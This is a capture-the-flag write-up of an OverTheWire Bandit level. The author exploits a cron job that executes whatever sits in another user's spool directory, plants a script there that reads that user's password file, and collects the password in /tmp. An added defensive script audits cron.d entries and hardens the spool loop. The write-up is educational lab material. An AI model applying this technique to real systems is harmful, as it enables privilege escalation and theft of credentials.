Exploiting Cron-Jobs
In this post, I would like to run through another one of OverTheWire's hacking challenges. To preserve the integrity of the challenges, all passwords in this post have been falsified.
Another day, another server. We have very limited access on our current user bandit23, and are tasked with gaining access to user bandit24.
One directory we can access, however, is /etc/cron.d. Unlike the per-user crontabs under /var/spool/cron, the files in /etc/cron.d are root-owned system crontabs, and each job line carries an extra field naming the user the job runs as.
There does indeed happen to be an active crontab file in this directory:
bandit23@bandit:~$ cd /etc/cron.d
bandit23@bandit:/etc/cron.d$ ls
cronjob_bandit24
Looking into this file, we can see that the crontab runs a bash script stored in another directory:
bandit23@bandit:/etc/cron.d$ cat cronjob_bandit24
@reboot bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
* * * * * bandit24 /usr/bin/cronjob_bandit24.sh &> /dev/null
The five asterisks in the schedule field mean this script runs every minute, and the sixth field shows that cron runs it as bandit24, even though the crontab file itself is owned by root.
Let's take a look at this bash script:
bandit23@bandit:/etc/cron.d$ cat /usr/bin/cronjob_bandit24.sh
#!/bin/bash
myname=$(whoami)
cd /var/spool/$myname
echo "Executing and deleting all scripts in /var/spool/$myname:"
for i in * .*;
do
    if [ "$i" != "." -a "$i" != ".." ];
    then
        echo "Handling $i"
        timeout -s 9 60 ./$i
        rm -f ./$i
    fi
done
So this script changes into /var/spool/bandit24 (the spool directory named after whichever user runs it), executes every file it finds there with a 60-second timeout, and then deletes each one. This works nicely for us!
If this cronjob executes a bash script, and that bash script executes other bash scripts... well then I just need to write a bash script.
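As an added defensive example (this is my own code, not part of the original post and not OverTheWire's), here is a small POSIX shell script that covers both weaknesses shown above: the cron.d entries whose sixth field decides which user runs the command, and the spool loop that blindly executes and deletes whatever another user dropped in. audit_cron_dir parses a cron.d-style directory and flags any job whose command file is owned by someone other than root or the job's user, or is writable by group/others; run_spool_safely is the same loop as the challenge script but only runs files that pass that ownership and permission check. The function names, the fixture built by make_fixture (a temporary directory standing in for /etc/cron.d, /usr/bin and /var/spool) and the 60-second timeout are my assumptions, chosen to mirror the challenge.

```shell
#!/bin/sh
# Added example, not code from the original post or from OverTheWire.
#   audit_cron_dir   - reads a cron.d-style directory (sixth field, or the
#                      field after an @reboot-style keyword, is the user the
#                      job runs as) and flags jobs whose command file could be
#                      modified by someone other than root or that user.
#   run_spool_safely - the "execute and delete everything in the spool
#                      directory" loop, rewritten to run only files owned by
#                      the job's user and writable by nobody else.
# Everything created by make_fixture is constructed under a temp directory.

# Owner name of PATH (third column of ls -ld; -L follows symlinks).
owner_of() { ls -ldL "$1" | awk '{print $3}'; }

# Succeeds when PATH carries the group-write or other-write permission bit
# (columns 6 and 9 of the ls mode string, e.g. "-rwxrwxrwx").
writable_by_others() {
    case "$(ls -ldL "$1" | cut -c6,9)" in *w*) return 0 ;; *) return 1 ;; esac
}

# Prints "ok" when USER may safely execute PATH, otherwise the reason why not.
check_runnable() {
    user="$1"; path="$2"
    if [ ! -e "$path" ]; then echo "missing"; return 0; fi
    owner=$(owner_of "$path")
    if [ "$owner" != "$user" ] && [ "$owner" != root ]; then
        echo "owned by $owner"; return 0
    fi
    if writable_by_others "$path"; then echo "writable by group/others"; return 0; fi
    echo ok
}

# Prints one "FILE user=U cmd=C: REASON" line per job in DIR whose command is
# not safe for its user. Comments, blank lines and VAR=value lines are skipped;
# relative commands (resolved through cron's PATH at run time) are reported.
audit_cron_dir() (
    for f in "$1"/*; do
        [ -f "$f" ] || continue
        set -f                       # cron fields such as '*' must not glob
        while IFS= read -r line || [ -n "$line" ]; do
            set -- $line
            case "${1:-}" in ''|'#'*|*=*) continue ;; esac
            case "$1" in
                @*) user="${2:-}"; cmd="${3:-}" ;;
                *)  user="${6:-}"; cmd="${7:-}" ;;
            esac
            [ -n "$cmd" ] || continue
            case "$cmd" in
                /*) reason=$(check_runnable "$user" "$cmd") ;;
                *)  reason="not an absolute path" ;;
            esac
            [ "$reason" = ok ] || echo "$f user=$user cmd=$cmd: $reason"
        done < "$f"
    done
)

# Hardened spool loop: executes, then deletes, each entry of DIR, but only
# regular executable files owned by USER (or root) that nobody else can write
# to; anything else is reported and deleted without being run. Runs in a
# subshell so the caller's working directory is untouched.
run_spool_safely() (
    user="$1"
    cd "$2" || exit 1
    for i in * .*; do
        [ "$i" != . ] && [ "$i" != .. ] || continue
        [ -e "$i" ] || continue      # unmatched glob in an empty directory
        reason=$(check_runnable "$user" "./$i")
        if [ "$reason" = ok ] && { [ ! -f "$i" ] || [ ! -x "$i" ]; }; then
            reason="not an executable regular file"
        fi
        if [ "$reason" = ok ]; then
            echo "Running $i"
            if command -v timeout >/dev/null 2>&1; then
                timeout -s KILL 60 "./$i" || echo "$i exited with status $?"
            else
                "./$i" || echo "$i exited with status $?"
            fi
        else
            echo "Skipping $i: $reason"
        fi
        rm -f "./$i"
    done
)

# Builds a constructed cron.d directory, command files and spool directory
# under a temporary prefix and prints that prefix. No real system file is touched.
make_fixture() {
    base=$(mktemp -d)
    me=$(id -un)
    mkdir -p "$base/cron.d" "$base/bin" "$base/spool"
    printf '#!/bin/sh\necho job\n' > "$base/bin/job.sh"
    printf '#!/bin/sh\necho ok\n'  > "$base/bin/ok.sh"
    chmod 777 "$base/bin/job.sh"            # the weak setting: anyone can edit it
    chmod 755 "$base/bin/ok.sh"             # the corrected setting
    {
        echo '# constructed cron.d file'
        echo 'PATH=/usr/bin:/bin'
        printf '* * * * * %s %s/bin/job.sh\n' "$me" "$base"
        printf '@reboot %s %s/bin/ok.sh\n' "$me" "$base"
    } > "$base/cron.d/jobs"
    # spool: one script we own with safe permissions, one anybody could edit
    printf '#!/bin/sh\ntouch "%s/ran-safe"\n' "$base"   > "$base/spool/safe.sh"
    printf '#!/bin/sh\ntouch "%s/ran-unsafe"\n' "$base" > "$base/spool/unsafe.sh"
    chmod 755 "$base/spool/safe.sh"
    chmod 777 "$base/spool/unsafe.sh"
    echo "$base"
}

# Walk-through when invoked as: sh cron_audit.sh demo
demo() {
    base=$(make_fixture)
    echo "== cron.d audit ==";   audit_cron_dir "$base/cron.d"
    echo "== spool run ==";      run_spool_safely "$(id -un)" "$base/spool"
    echo "== marker files ==";   ls "$base"
    rm -rf "$base"
}
if [ "${1:-}" = demo ]; then demo; fi
```

Running the demo reports the 777 command file from the cron.d audit, executes only safe.sh from the spool (so ran-safe appears and ran-unsafe does not), and empties the spool directory either way. The ownership test is what matters against the trick used in this level: a script copied in by bandit23 is owned by bandit23, so a spool runner that insists on its own user's ownership would refuse it even if the file's mode looked harmless.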
I'll start with making my own directory where I have ownership:
bandit23@bandit:~$ mkdir /tmp/skyenet
bandit23@bandit:~$ chmod 777 /tmp/skyenet
We were shown earlier in the series that there is a directory /etc/bandit_pass/ where user passwords are stored, with each file readable only by its own user. If bandit24 will be executing this bash script, then we can have them fetch their own password and share it with us.
And so that's what I will do!
Creating our script as follows will print the contents of bandit24's password file and write it to a new .txt file inside our own directory:
bandit23@bandit:~$ touch /tmp/skyenet/script.sh
bandit23@bandit:~$ cat /tmp/skyenet/script.sh
#!/bin/bash
# Absolute path: the cron job runs from /var/spool/bandit24, not from /tmp
cat /etc/bandit_pass/bandit24 > /tmp/skyenet/password.txt
Now we can make our script executable, and deviously place this in bandit24's /var/spool/ directory:
bandit23@bandit:~$ chmod +x /tmp/skyenet/script.sh
bandit23@bandit:~$ cp /tmp/skyenet/script.sh /var/spool/bandit24/
As soon as the cronjob next runs, our script will be executed and a .txt will hopefully appear in our directory:
bandit23@bandit:~$ cd /tmp/skyenet/
bandit23@bandit:/tmp/skyenet$ ls
script.sh
Not yet...
bandit23@bandit:/tmp/skyenet$ ls
script.sh
Nearly there...
bandit23@bandit:~$ cd /tmp/skyenet/
bandit23@bandit:/tmp/skyenet$ ls
script.sh password.txt
bandit23@bandit:/tmp/skyenet$ cat password.txt
UoMYTmg6gzctqArfrBFHyQXwOmw1IohZ
Success! We have our password, and can proceed to SSH into user bandit24.
This has been a quick look into exploiting cronjobs and user permissions.
Thank you for reading!